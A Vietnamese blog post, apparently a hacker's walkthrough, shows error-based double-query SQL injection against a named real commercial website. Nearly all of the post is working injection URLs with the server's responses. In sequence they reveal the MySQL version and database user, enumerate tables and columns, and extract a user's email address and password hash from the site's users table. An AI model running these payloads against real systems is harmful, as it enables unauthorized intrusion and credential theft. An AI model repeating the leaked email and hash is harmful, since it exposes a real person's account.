Tuesday, June 10, 2014

Error Based/Double Query SQL injection

Error Based/Double Query SQL injection


victim : http://hanggiasoc.vn/tim-kiem?q=%27
error : CDbCommand không thể thi hành câu truy vấn SQL: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' AND published = 1' at line 1

Tìm database : 
http://hanggiasoc.vn/tim-kiem?q=1' or+1+group+by+concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))+having+min(0)+or+1-- -

'5.0.96:betahgs:betahgs@localhost:1' for key 1

Tìm tables :
http://hanggiasoc.vn/tim-kiem?q=1' and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

'authassignment~1' for key 1

table mình cần là table user : ( tăng limit )
http://hanggiasoc.vn/tim-kiem?q=1' and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 26,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

Duplicate entry 'users~1' for key 1

Hiển thị column của table vừa tìm:
http://hanggiasoc.vn/tim-kiem?q=1' and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -


tăng limit để tìm các column mình cần: (email,password)
http://hanggiasoc.vn/tim-kiem?q=1' and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
 Duplicate entry 'email~1' for key 1

http://hanggiasoc.vn/tim-kiem?q=1' and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

Duplicate entry 'password~1' for key 1

Kết quả :
http://hanggiasoc.vn/tim-kiem?q=1' and (select 1 from (select count(*),concat((select(select concat(cast(concat(email) as char),0x7e)) from betahgs.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
Duplicate entry '007.heineken@gmail.com~1' for key 1

tương tự 
http://hanggiasoc.vn/tim-kiem?q=1' and (select 1 from (select count(*),concat((select(select concat(cast(concat(password) as char),0x7e)) from betahgs.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
'1a2a861efa455bfa46f387e8cf4818e1~1' for key 1

End :v


Được đăng bởi vào lúc
Nhãn: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)